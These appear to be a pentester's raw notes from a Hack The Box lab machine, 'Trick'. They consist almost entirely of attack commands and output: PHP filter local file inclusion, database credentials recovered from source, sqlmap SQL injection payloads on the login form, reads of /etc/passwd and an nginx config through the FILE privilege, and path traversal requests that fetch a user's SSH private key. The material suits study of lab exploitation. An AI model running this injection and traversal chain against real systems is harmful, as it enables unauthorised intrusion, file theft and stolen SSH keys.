Foothold

 /index.php?page=php://filter/read=convert.base64-encode/resource=payroll

GET /index.php?page=php://filter/read=convert.base64-encode/resource=db_connect 

And decode

remo:TrulyImpossiblePasswordLmao123

adot@pwndot:~/htb/trick$ sqlmap -r login.req --batch  --level=5 --risk=3 --technique=BEU
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
<SNIP>
[08:36:30] [INFO] testing 'MySQL UNION query (50) - 61 to 80 columns'
[08:36:31] [INFO] testing 'MySQL UNION query (100) - 81 to 100 columns'
[08:36:32] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 591 HTTP(s) requests:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: username=a' OR NOT 4668=4668-- iwVv&password=aa

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username=a' OR (SELECT 2021 FROM(SELECT COUNT(*),CONCAT(0x716b6b7871,(SELECT (ELT(2021=2021,1))),0x716b6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Gcxp&password=aa
---
[08:36:32] [INFO] the back-end DBMS is MySQL

adot@pwndot:~/htb/trick$ sqlmap -r login.req --batch  --level=5 --risk=3 --technique=BEU  --privilege
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9#stable}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

<SNIP>
[08:36:39] [INFO] fetching database users privileges
[08:36:40] [INFO] retrieved: ''remo'@'localhost''
[08:36:40] [INFO] retrieved: 'FILE'
database management system users privileges:
[*] 'remo'@'localhost' [1]:
    privilege: FILE

[08:36:40] [INFO] fetched data logged to text files under '/home/adot/.local/share/sqlmap/output/preprod-payroll.trick.htb'

[*] ending @ 08:36:40 /2025-02-25/

adot@pwndot:~/htb/trick$ sqlmap -r login.req --batch  --level=5 --risk=3 --technique=BEU  --file-read=/etc/passwd
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
<SNIP>
[08:41:52] [INFO] fingerprinting the back-end DBMS operating system
[08:41:52] [INFO] the back-end DBMS operating system is Linux
[08:41:52] [INFO] fetching file: '/etc/passwd'
726F6F743A783A303A303A726F6F743A2F726F6F743A2F62696E2F626173680A6461656D6F6E3A783A313A313A6461656D6F6E3A2F7573722F7362696E3A2F7573722F7362696E2F6E6F6C6F67696E0A62696E3A783A323A323A62696E3A2F62696E3A2F7573722F7362696E2F6E6F6C6F67696E0A7379733A783A333A333A7379733A2F6465763A2F7573722F7362696E2F6E6F6C6F67696E0A73796E633A783A343A36353533343A73796E633A2F62696E3A2F62696E2F73796E630A67616D65733A783A353A36303A67616D65733A2F7573722F67616D65733A2F7573722F7362696E2F6E6F6C6F67696E0A6D616E3A783A363A31323A6D616E3A2F7661722F63616368652F6D616E3A2F7573722F7362696E2F6E6F6C6F67696E0A6C703A783A373A373A6C703A2F7661722F73706F6F6C2F6C70643A2F7573722F7362696E2F6E6F6C6F67696E0A6D61696C3A783A383A383A6D61696C3A2F7661722F6D61696C3A2F7573722F7362696E2F6E6F6C6F67696E0A6E6577733A783A393A393A6E6577733A2F7661722F73706F6F6C2F6E6577733A2F7573722F7362696E2F6E6F6C6F67696E0A757563703A783A31303A31303A757563703A2F7661722F73706F6F6C2F757563703A2F7573722F7362696E2F6E6F6C6F67696E0A70726F78793A783A31333A31333A70726F78793A2F62696E3A2F7573722F7362696E2F6E6F6C6F67696E0A7777772D646174613A783A33333A33333A7777772D646174613A2F7661722F7777773A2F7573722F7362696E2F6E6F6C6F67696E0A6261636B75703A783A33343A33343A6261636B75703A2F7661722F6261636B7570733A2F7573722F7362696E2F6E6F6C6F67696E0A6C6973743A783A33383A33383A4D61696C696E67204C697374204D616E616765723A2F7661722F6C6973743A2F7573722F7362696E2F6E6F6C6F67696E0A6972633A783A33393A33393A697263643A2F7661722F72756E2F697263643A2F7573722F7362696E2F6E6F6C6F67696E0A676E6174733A783A34313A34313A476E617473204275672D5265706F7274696E672053797374656D202861646D696E293A2F7661722F6C69622F676E6174733A2F7573722F7362696E2F6E6F6C6F67696E0A6E6F626F64793A783A36353533343A36353533343A6E6F626F64793A2F6E6F6E6578697374656E743A2F7573722F7362696E2F6E6F6C6F67696E0A5F6170743A783A3130303A36353533343A3A2F6E6F6E6578697374656E743A2F7573722F7362696E2F6E6F6C6F67696E0A73797374656D642D74696D6573796E633A783A3130313A3130323A73797374656D642054696D652053796E6368726F6E697A6174696F6E2C2C2C3A2F72756E2F73797374656D643A2F7573722F7362696E2F6E6F6C6F67696E0A73797374656D642D6E6574776F726B3A783A3130323A3130333A73797374656D64204E6574776F726B204D616E6167656D656E742C2C2C3A2F72756E2F73797374656D643A2F7573722F7362696E2F6E6F6C6F67696E0A73797374656D642D7265736F6C76653A783A3130333A3130343A73797374656D64205265736F6C7665722C2C2C3A2F72756E2F73797374656D643A2F7573722F7362696E2F6E6F6C6F67696E0A6D6573736167656275733A783A3130343A3131303A3A2F6E6F6E6578697374656E743A2F7573722F7362696E2F6E6F6C6F67696E0A7473733A783A3130353A3131313A54504D3220736F66747761726520737461636B2C2C2C3A2F7661722F6C69622F74706D3A2F62696E2F66616C73650A646E736D6173713A783A3130363A36353533343A646E736D6173712C2C2C3A2F7661722F6C69622F6D6973633A2F7573722F7362696E2F6E6F6C6F67696E0A7573626D75783A783A3130373A34363A7573626D7578206461656D6F6E2C2C2C3A2F7661722F6C69622F7573626D75783A2F7573722F7362696E2F6E6F6C6F67696E0A72
<SNIP>

adot@pwndot:~/htb/trick$ sqlmap -r login.req --batch  --level=5 --risk=3 --technique=BEU  --file-read=/etc/nginx/sites-enabled/default
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[

adot@pwndot:~/htb/trick$ cat /home/adot/.local/share/sqlmap/output/preprod-payroll.trick.htb/files/_etc_nginx_sites-enabled_default
server {
        listen 80 default_server;
        listen [::]:80 default_server;
        server_name trick.htb;
        root /var/www/html;

        index index.html index.htm index.nginx-debian.html;

        server_name _;

        location / {
                try_files $uri $uri/ =404;
        }

        location ~ \.php$ {
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/run/php/php7.3-fpm.sock;
        }
}


server {
        listen 80;
        listen [::]:80;

        server_name preprod-marketing.trick.htb;

        root /var/www/market;
        index index.php;

        location / {
                try_files $uri $uri/ =404;
        }

        location ~ \.php$ {
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/run/php/php7.3-fpm-michael.sock;
        }
}

server {
        listen 80;
        listen [::]:80;

        server_name preprod-payroll.trick.htb;

        root /var/www/payroll;
        index index.php;

        location / {
                try_files $uri $uri/ =404;
        }

        location ~ \.php$ {
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/run/php/php7.3-fpm.sock;
        }
}

adot@pwndot:~/htb/trick$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       Pixel7

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.11.166 trick.htb root.trick.htb preprod-payroll.trick.htb preprod-marketing.trick.htb

http://preprod-marketing.trick.htb/index.php?page=services.html

GET /index.php?page=....//....//....//....//....//etc/passwd

GET /index.php?page=....//....//....//....//....//home/michael/.ssh/id_rsa

adot@pwndot:~/htb/trick$ vi id_rsa

adot@pwndot:~/htb/trick$ chmod 600 id_rsa